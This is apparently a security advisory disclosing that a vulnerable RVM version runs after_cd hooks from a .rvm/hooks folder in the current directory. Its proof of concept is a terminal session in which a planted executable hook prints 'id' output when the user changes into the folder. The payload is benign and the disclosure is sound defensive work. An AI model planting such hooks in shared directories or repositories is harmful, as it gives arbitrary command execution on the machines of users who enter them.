RVM automatically executes hooks located in $PWD

RVM, by default, hooks cd and automatically executes various auxiliary hooks
when a user changes into a directory. The mechanics of these additional
after_cd hooks are detailed at <https://rvm.io/workflow/hooks&gt;.

What this page fails to mention is that hooks, as of a vulnerable version, are
not only loaded from ~/.rvm/hooks but are also loaded from $PWD/.rvm/hooks
as per the code, as of a vulnerable commit, at
<https://github.com/rvm/rvm/blob/b04c0158d/scripts/hook#L23-L27&gt;.

This behaviour can be used to achieve arbitrary command execution when a user
changes into a directory with malicious contents.

Note that hook files must be executable for them to be triggered.

POC

rvm@e6aeaf6d79ec:~$ mkdir -p poc/.rvm/hooks

rvm@e6aeaf6d79ec:~$ cat > poc/.rvm/hooks/after_cd_poc
#!/bin/sh
echo "Command execution as $(id)"
^D

rvm@e6aeaf6d79ec:~$ chmod a+x poc/.rvm/hooks/after_cd_poc

rvm@e6aeaf6d79ec:~$ cd poc

Command execution as uid=1000(rvm) gid=1000(rvm) groups=1000(rvm)
rvm@e6aeaf6d79ec:~/poc$